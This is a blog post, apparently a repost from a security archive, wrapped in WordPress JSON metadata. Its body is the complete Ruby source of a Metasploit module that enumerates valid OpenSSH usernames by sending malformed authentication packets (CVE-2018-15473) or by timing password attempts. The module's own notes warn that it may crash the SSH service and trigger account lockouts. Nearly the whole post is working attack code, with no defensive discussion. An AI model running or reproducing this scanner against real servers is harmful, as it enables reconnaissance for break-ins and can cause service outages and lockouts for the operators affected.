{"id":59366,"date":"2024-09-01T21:29:49","date_gmt":"2024-09-01T18:29:49","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181223\/ssh_enumusers.rb.txt"},"modified":"2024-09-01T21:29:49","modified_gmt":"2024-09-01T18:29:49","slug":"ssh-username-enumeration","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ssh-username-enumeration\/","title":{"rendered":"SSH Username Enumeration"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘SSH Username Enumeration’,
‘Description’ => %q{
This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server.<\/p>\n

The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST
packet using public key authentication (must be enabled) to enumerate users.<\/p>\n

On some versions of OpenSSH under some configurations, OpenSSH will return a
“permission denied” error for an invalid user faster than for a valid user,
creating an opportunity for a timing attack to enumerate users.<\/p>\n

Testing note: invalid users were logged, while valid users were not. YMMV.
},
‘Author’ => [
‘kenkeiras’, # Timing attack
‘Dariusz Tytko’, # Malformed packet
‘Michal Sajdak’, # Malformed packet
‘Qualys’, # Malformed packet
‘wvu’ # Malformed packet
],
‘References’ => [
[‘CVE’, ‘2003-0190’],
[‘CVE’, ‘2006-5229’],
[‘CVE’, ‘2016-6210’],
[‘CVE’, ‘2018-15473’],
[‘OSVDB’, ‘32721’],
[‘BID’, ‘20418’],
[‘URL’, ‘https:\/\/seclists.org\/oss-sec\/2018\/q3\/124’],
[‘URL’, ‘https:\/\/sekurak.pl\/openssh-users-enumeration-cve-2018-15473\/’]],
‘License’ => MSF_LICENSE,
‘Actions’ => [
[
‘Malformed Packet’,
{
‘Description’ => ‘Use a malformed packet’,
‘Type’ => :malformed_packet
}
],
[
‘Timing Attack’,
{
‘Description’ => ‘Use a timing attack’,
‘Type’ => :timing_attack
}
]],
‘DefaultAction’ => ‘Malformed Packet’,
‘Notes’ => {
‘Stability’ => [
CRASH_SERVICE_DOWN # possible that a malformed packet may crash the service
],
‘Reliability’ => [],
‘SideEffects’ => [
IOC_IN_LOGS,
ACCOUNT_LOCKOUTS, # timing attack submits a password
]}
)
)<\/p>\n

register_options(
[
Opt::Proxies,
Opt::RPORT(22),
OptString.new(‘USERNAME’,
[false, ‘Single username to test (username spray)’]),
OptPath.new(‘USER_FILE’,
[false, ‘File containing usernames, one per line’]),
OptBool.new(‘DB_ALL_USERS’,
[false, ‘Add all users in the current database to the list’, false]),
OptInt.new(‘THRESHOLD’,
[
true,
‘Amount of seconds needed before a user is considered ‘ \\
‘found (timing attack only)’, 10
]),
OptBool.new(‘CHECK_FALSE’,
[false, ‘Check for false positives (random username)’, true])
])<\/p>\n

register_advanced_options(
[
OptInt.new(‘RETRY_NUM’,
[
true, ‘The number of attempts to connect to a SSH server’ \\
‘ for each user’, 3
]),
OptInt.new(‘SSH_TIMEOUT’,
[
false, ‘Specify the maximum time to negotiate a SSH session’,
10
]),
OptBool.new(‘SSH_DEBUG’,
[
false, ‘Enable SSH debugging output (Extreme verbosity!)’,
false
])
])
end<\/p>\n

def rport
datastore[‘RPORT’]end<\/p>\n

def retry_num
datastore[‘RETRY_NUM’]end<\/p>\n

def threshold
datastore[‘THRESHOLD’]end<\/p>\n

# Returns true if a nonsense username appears active.
def check_false_positive(ip)
user = Rex::Text.rand_text_alphanumeric(8..32)
attempt_user(user, ip) == :success
end<\/p>\n

def check_user(ip, user, port)
technique = action[‘Type’]\n

opts = ssh_client_defaults.merge({
port: port
})<\/p>\n

# The auth method is converted into a class name for instantiation,
# so malformed-packet here becomes MalformedPacket from the mixin
case technique
when :malformed_packet
opts.merge!(auth_methods: [‘malformed-packet’])
when :timing_attack
opts.merge!(
auth_methods: [‘password’, ‘keyboard-interactive’],
password: rand_pass
)
end<\/p>\n

opts.merge!(verbose: :debug) if datastore[‘SSH_DEBUG’]\n

start_time = Time.new<\/p>\n

begin
ssh = Timeout.timeout(datastore[‘SSH_TIMEOUT’]) do
Net::SSH.start(ip, user, opts)
end
rescue Rex::ConnectionError
return :connection_error
rescue Timeout::Error
return :success if technique == :timing_attack
rescue Net::SSH::AuthenticationFailed
return :fail if technique == :malformed_packet
rescue Net::SSH::Exception => e
vprint_error(“#{e.class}: #{e.message}”)
end<\/p>\n

finish_time = Time.new<\/p>\n

case technique
when :malformed_packet
return :success if ssh
when :timing_attack
return :success if (finish_time – start_time > threshold)
end<\/p>\n

:fail
end<\/p>\n

def rand_pass
Rex::Text.rand_text_english(64_000..65_000)
end<\/p>\n

def do_report(ip, user, _port)
service_data = {
address: ip,
port: rport,
service_name: ‘ssh’,
protocol: ‘tcp’,
workspace_id: myworkspace_id
}<\/p>\n

credential_data = {
origin_type: :service,
module_fullname: fullname,
username: user
}.merge(service_data)<\/p>\n

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED
}.merge(service_data)<\/p>\n

create_credential_login(login_data)
end<\/p>\n

# Because this isn’t using the AuthBrute mixin, we don’t have the
# usual peer method
def peer(rhost = nil)
“#{rhost}:#{rport} – SSH -“
end<\/p>\n

def user_list
users = []\n

users << datastore[‘USERNAME’] unless datastore[‘USERNAME’].blank?<\/p>\n

if datastore[‘USER_FILE’]fail_with(Failure::BadConfig, ‘The USER_FILE is not readable’) unless File.readable?(datastore[‘USER_FILE’])
users += File.read(datastore[‘USER_FILE’]).split
end<\/p>\n

if datastore[‘DB_ALL_USERS’]if framework.db.active
framework.db.creds(workspace: myworkspace.name).each do |o|
users << o.public.username if o.public
end
else
print_warning(‘No active DB — The following option will be ignored: DB_ALL_USERS’)
end
end<\/p>\n

users.uniq
end<\/p>\n

def attempt_user(user, ip)
attempt_num = 0
ret = nil<\/p>\n

while (attempt_num <= retry_num) && (ret.nil? || (ret == :connection_error))
if attempt_num > 0
Rex.sleep(2**attempt_num)
vprint_status(“#{peer(ip)} Retrying ‘#{user}’ due to connection error”)
end<\/p>\n

ret = check_user(ip, user, rport)
attempt_num += 1
end<\/p>\n

ret
end<\/p>\n

def show_result(attempt_result, user, ip)
case attempt_result
when :success
print_good(“#{peer(ip)} User ‘#{user}’ found”)
do_report(ip, user, rport)
when :connection_error
vprint_error(“#{peer(ip)} User ‘#{user}’ could not connect”)
when :fail
vprint_error(“#{peer(ip)} User ‘#{user}’ not found”)
end
end<\/p>\n

def run
if user_list.empty?
fail_with(Failure::BadConfig, ‘Please populate DB_ALL_USERS, USER_FILE, USERNAME’)
end<\/p>\n

super
end<\/p>\n

def run_host(ip)
print_status(“#{peer(ip)} Using #{action.name.downcase} technique”)<\/p>\n

if datastore[‘CHECK_FALSE’]print_status(“#{peer(ip)} Checking for false positives”)
if check_false_positive(ip)
print_error(“#{peer(ip)} throws false positive results. Aborting.”)
return
end
end<\/p>\n

users = user_list<\/p>\n

print_status(“#{peer(ip)} Starting scan”)
users.each { |user| show_result(attempt_user(user, ip), user, ip) }
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::SSHinclude Msf::Auxiliary::Scannerinclude Msf::Auxiliary::Report def initialize(info = {})super(update_info(info,‘Name’ => ‘SSH Username Enumeration’,‘Description’ => %q{This module uses a malformed packet or timing attack to enumerate users onan OpenSSH server. The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUESTpacket using public key authentication (must be enabled) …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59366","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59366"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59366\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}